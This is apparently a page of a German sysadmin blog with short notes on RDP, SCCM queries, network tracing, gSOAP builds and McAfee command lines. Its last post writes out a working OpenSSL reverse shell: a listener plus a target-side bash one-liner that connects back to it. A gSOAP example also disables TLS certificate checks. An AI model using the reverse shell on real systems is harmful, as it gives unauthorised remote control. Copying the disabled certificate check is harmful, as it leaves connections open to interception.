romgal – Seite 7 – das sanieren wir später….

UDP im RDP Client disablen

Posted on 22. Oktober 2020 by roman

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f

Rerun Advertisement Powershell Oneliner

Posted on 11. September 2020 by roman

([wmiclass]"\\$computername\root\ccm:SMS_Client").TriggerSchedule(((gwmi -computername $computername -namespace root\ccm\policy\machine\actualconfig -query "select * from ccm_scheduler_scheduledmessage where ScheduledMessageID like '%$advertisementid_or_packageid%'").ScheduledMessageID))

Wenn das nicht hilft hat der Client für sich beschlossen dass er/sie/es das schon zur Zufriedenheit Aller nach bestem Wissen und Gewissen erledigt hat dann hilft das hier (dafür muss das Deployment aber auf “Always rerun”) stehen!) – anschließend MachinePol triggern oder CCMEXEC restarten um Rerun zu beschleunigen:

gwmi -Computername $computername -Namespace root\ccm\Scheduler -Query "select * from ccm_scheduler_history where ScheduleID like '%$advertisementid_or_packageid%'"|Remove-WmiObject

Geklaut von hier bzw. hier.

ETL auf PCAP konvertieren

Posted on 24. April 2020 by roman

NETSH TRACE START CAPTURE=YES PERSISTENT=YES ist ja fein, erzeugt aber leider nur ein ETL welches man sich (diskussionswert sinnvoll) nur mit dem nicht mehr supporteten Message Analyzer anschauen kann – mit

https://github.com/microsoft/etl2pcapng

kann man aber eine solche ETL Datei in ein PCAPNG File umwandeln und dann mit Wireshark in gewohnter Manier öffnen.

Besonderheit: Im Paketkommentar wird die PID des Prozesses welcher das Paket gesendet oder empfangen hat hinterlegt (was nicht immer stimmt wegen DPCs aber manchmal doch hilfreich sein kann). Filter mit:

frame.comment == "PID=1234"

Dreist geklaut von: https://4sysops.com/archives/how-to-capture-a-network-trace-from-a-remote-computer/

UNC Pfad mit IPv6 Adressen

Posted on 16. April 2020 by roman

Aus irgendeinem nicht wirklich nachvollziehbaren Grund kann Explorer nicht mit IPv6 Adressen in UNC Pfaden umgehen. MS hat dafür wohl eine sehr “spezielle” Lösung gebaut (geklaut von hier): Einfach die Adresse nehmen, alle : durch – ersetzen (% durch s) und “ipv6-literal.net” hinten dran hängen.

Der Name wird dann nicht über den DNS aufgelöst sondern bleibt als Spezialzweig völlig intern.

Beispiel:

\\fd00-123-456-789-abc-def-1234-4567.ipv6-literal.net\share$

ISATAP “renewen”

Posted on 12. November 2019 by roman

Falls ISATAP Adapter mal nicht will (keine Adresse) scheint folgendes zu helfen:

Set-NetISATAPconfiguration -Router ''
Set-NetISATAPconfiguration -Router 'meinisataprouter.meins.at'

ISATAP Config:

Get-NetISATAPconfiguration
netsh interface ipv6 isatap show router
netsh interface ipv6 isatap show state

IP Helper Service restarten ist natürlich immer ein gute Idee 😀

SCCM Query: Windows 10 Buildnummern

Posted on 17. Oktober 2019 by roman

Weil die meisten SCCM Reports nur bis zur dritten Buildnummer (10.0.n) gehen und die letzte Nummer fast nirgends zu bekommen ist:

select v_GS_OPERATING_SYSTEM.Caption0, vSMS_R_System.BuildExt as Build, count(*) as Anzahl
 from  vSMS_R_System 
 inner join v_GS_OPERATING_SYSTEM on v_GS_OPERATING_SYSTEM.ResourceID = vSMS_R_System.ItemKey 
 where v_GS_OPERATING_SYSTEM.Caption0 like '%Windows 10%'
 group by v_GS_OPERATING_SYSTEM.Caption0,vSMS_R_System.BuildExt
 order by v_GS_OPERATING_SYSTEM.Caption0,vSMS_R_System.BuildExt

SCCM Query: Failed Deployment

Posted on 17. Oktober 2019 by roman

Namen der Rechner auf denen ein Deployment fehlgeschlagen ist:

select sys.Name0 from vSMS_R_System as sys inner join vSMS_ClientAdvertisementStatus as offer on sys.ItemKey=offer.ResourceID WHERE AdvertisementID = 'XXXnnnnnn' and LastStateName = 'Failed'

gSOAP auf Ubuntu 16.04

Posted on 27. September 2019 by roman

Wiederum als Erinnerungshilfe für gSOAP Client auf Linux (eLux in dem Fall) gegen .NET Web Service (die alte Version, die mit .asmx). Durchgeführt auf einem Windows 10 Rechner mit WSL + Ubuntu 16.04 (!!).

build-essential, bison, flex, openssl, libssl-dev installieren

automake 1.16 deb installieren

gSOAP Sourcen runterladen/entpacken (im Beispiel Version 2.8.93 im Codeverzeichnis)

./configure
make
sudo make install

wsdl2h -c -o service.h https://whereever/whatever/service.asmx

soapcpp2 -c service.h

#include "soapH.h"     // wird von soapccp2 erzeugt
#include "ServiceSoap.nsmap"  // wird von soapccp2 erzeugt

int main(int argc, char** argv)
{
   struct soap *soap = soap_new();
   struct _tempuri__MethodResponse Result;

   soap->ssl_flags = SOAP_SSL_NO_AUTHENTICATION;

   if (soap_call___tempuri__Method(soap, NULL, NULL, NULL, &Result) == SOAP_OK)
   {
      printf("Result: %s\n" , Result.MethodResult);
   }
   else
      soap_print_fault(soap, stderr);
 }

“Method” ist der Name der Methode. In dem Fall gibt das Ding nur einen String zurück und hat keine Parameter (die letzte NULL vorm &Result beim Aufruf).

“tempuri” ist der Namespace des Services (Attribut [Namespace] im ASMX). Muss man ggf. aus dem erzeugten service.h ermitteln.

g++ -o service -DWITH_OPENSSL service.c soapC.c soapClient.c ./gsoap_2.8.93/gsoap-2.8/gsoap/stdsoap2.c ./gsoap_2.8.93/gsoap-2.8/gsoap/libgsoapssl.a -lssl -lcrypto

-DWITH_OPENSSL für Services auf HTTPS (bedingt -lssl und -lcrypto) – müssen hinter den Inputfiles stehen!
soapC.c und soapClient.c werden von soapcpp2 erzeugt
stdsoap2.c und libgsoapssl.a werden beim Build von gSOAP erzeugt – .a weil Library dann statisch gelinked wird (auf eLux nicht vorhanden).

McAfee ENS command line

Posted on 19. September 2019 by roman

Ein paar Command Lines wenn das Ding nicht so will wie es soll und/oder GUI verreckt ist (Agent 5.6.2/ENS 10.6.1):

Das was im Kontextmenü unter “McAfee Endpoint Security” firmiert:

"C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform\MFEConsole.exe"

McAfee Agent Statusmonitor:

"C:\Program Files\McAfee\Agent\cmdagent.exe" -s

(-i liefert Konfiguration auf die Konsole)

Update anwerfen:

"C:\Program Files\McAfee\Endpoint Security\Threat Prevention\amcfg.exe" /update

Managed Agent deinstallieren:

"C:\Program Files\Mcafee\Agent\x86\frminst.exe" /remove=agent

Managed ATP deinstallieren:

"C:\Program Files (x86)\McAfee\Endpoint Security\Adaptive Threat Protection\RepairCache\SetupATP.exe" /x /removeespsynchronously /PASSWORD=whatever

Reverse Shell mit OpenSSL

Posted on 19. September 2019 by roman

An sich eh altes Zeug aber ich finds nie wenn ichs such daher hier nur für mich:

Am eigenen Arbeitsplatz (ich habs mit Linux gemacht, theoretisch müssts auch unter Windows gehen:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -accept 4711

Auf dem Ziel::

mkfifo /tmp/rs; /bin/bash -i < /tmp/rs 2>&1 | openssl s_client -quiet -connect mein_arbeitsplatz:4711 > /tmp/rs; rm /tmp/rs